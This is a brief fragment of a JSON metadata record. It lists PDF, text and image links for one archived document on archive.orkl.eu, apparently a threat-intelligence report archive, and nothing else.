		"pdf": "https://archive.orkl.eu/072929111694cfc003586a2f3544f38bb24a62b7.pdf",
		"text": "https://archive.orkl.eu/072929111694cfc003586a2f3544f38bb24a62b7.txt",
		"img": "https://archive.orkl.eu/072929111694cfc003586a2f3544f38bb24a62b7.jpg"
	}
}